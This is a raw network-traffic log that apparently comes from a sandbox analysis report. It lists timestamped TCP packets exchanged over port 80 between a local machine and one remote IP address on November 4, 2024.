                                                              Nov 4, 2024 09:28:00.226145029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226156950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226169109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226175070 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226181984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226197004 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226207018 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226212025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226227045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226233959 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226239920 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226253033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226253986 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226277113 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226280928 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226289988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226301908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226306915 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226315975 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226329088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226334095 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226356030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226363897 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226367950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226378918 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226382971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226399899 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226409912 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226411104 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226424932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226433039 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226440907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226453066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226455927 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226470947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226480007 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226485014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226502895 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226505041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.226531029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226557970 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227111101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227123976 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227135897 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227148056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227159023 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227166891 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227171898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227189064 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227193117 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227205038 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227209091 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227216959 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227230072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227237940 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227241039 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227255106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227258921 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227267981 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227282047 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227284908 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227294922 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227303028 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227308989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227328062 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227334023 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227350950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227359056 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227364063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227376938 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227377892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227391005 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227402925 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227404118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227416992 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227430105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227436066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227443933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227453947 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227458000 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227468014 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227479935 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227495909 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227524996 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.227960110 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227973938 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227986097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.227996111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228012085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228017092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228025913 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228039026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228050947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228054047 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228064060 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228069067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228082895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228094101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228095055 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228110075 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228113890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228127956 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228141069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228142023 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228152037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228158951 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228164911 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228166103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228178024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228189945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228202105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228208065 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228214025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228225946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228228092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228239059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228250980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228251934 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228262901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228269100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228276968 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228288889 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228302002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228303909 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228313923 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228316069 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228328943 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228342056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228346109 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228355885 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228373051 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228389978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228413105 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228861094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228877068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228889942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228902102 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228914976 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228924990 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228929996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228944063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228955030 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228956938 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228970051 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.228971958 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.228991985 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229000092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229006052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229017973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229023933 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229032040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229043961 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229048014 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229058981 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229072094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229074001 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229084969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229087114 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229098082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229110003 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229115963 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229123116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229135036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229142904 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229147911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229161978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229161978 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229176044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229176998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229190111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229201078 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229208946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229214907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229227066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229227066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229242086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229247093 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229255915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229274988 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229300976 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229851007 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229863882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229878902 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229897022 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229908943 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229913950 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229922056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229923010 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229943991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229955912 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229954958 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229969025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229981899 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229983091 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.229994059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.229995966 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230009079 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230022907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230026960 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230036974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230050087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230061054 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230065107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230081081 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230086088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230093956 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230102062 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230108976 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230119944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230132103 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230132103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230148077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230148077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230161905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230173111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230176926 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230185986 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230201006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230201960 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230216026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230225086 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230227947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230240107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230243921 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230252981 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230267048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230277061 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230279922 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230288029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230293989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230308056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230308056 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230334997 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230360985 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230698109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230710983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230722904 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230735064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230746031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230760098 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230762005 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230772018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230787039 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230786085 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230799913 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230807066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230825901 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230845928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230850935 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230859995 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230871916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230882883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230895996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230901957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230910063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230921984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230927944 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230935097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230947971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230952024 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230961084 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230973005 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230978966 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.230988026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.230998993 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231003046 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231013060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231024027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231029987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231036901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231050014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231054068 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231075048 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231096029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231558084 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231570959 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231580019 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231597900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231611013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231611967 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231623888 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231633902 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231637955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231650114 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231652975 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231662989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231681108 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231683016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231698036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231705904 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231710911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231724024 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231726885 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231736898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231748104 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231750965 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231760025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231772900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231776953 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231786966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231796980 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231801033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231812000 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231815100 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231828928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231834888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231842995 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231854916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231862068 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231868029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231885910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231887102 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231903076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231914043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231919050 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231928110 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231930017 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231941938 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231954098 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231956005 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231970072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231980085 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.231983900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231996059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.231998920 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.232009888 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232021093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232024908 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.232049942 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.232069969 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.232491016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232511044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232522011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232533932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232546091 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232556105 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.232559919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232574940 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232588053 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.232601881 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.232640028 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232664108 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.232678890 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.232862949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.232909918 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.002204895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.002276897 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.210947037 CET4993280192.168.2.789.40.31.232
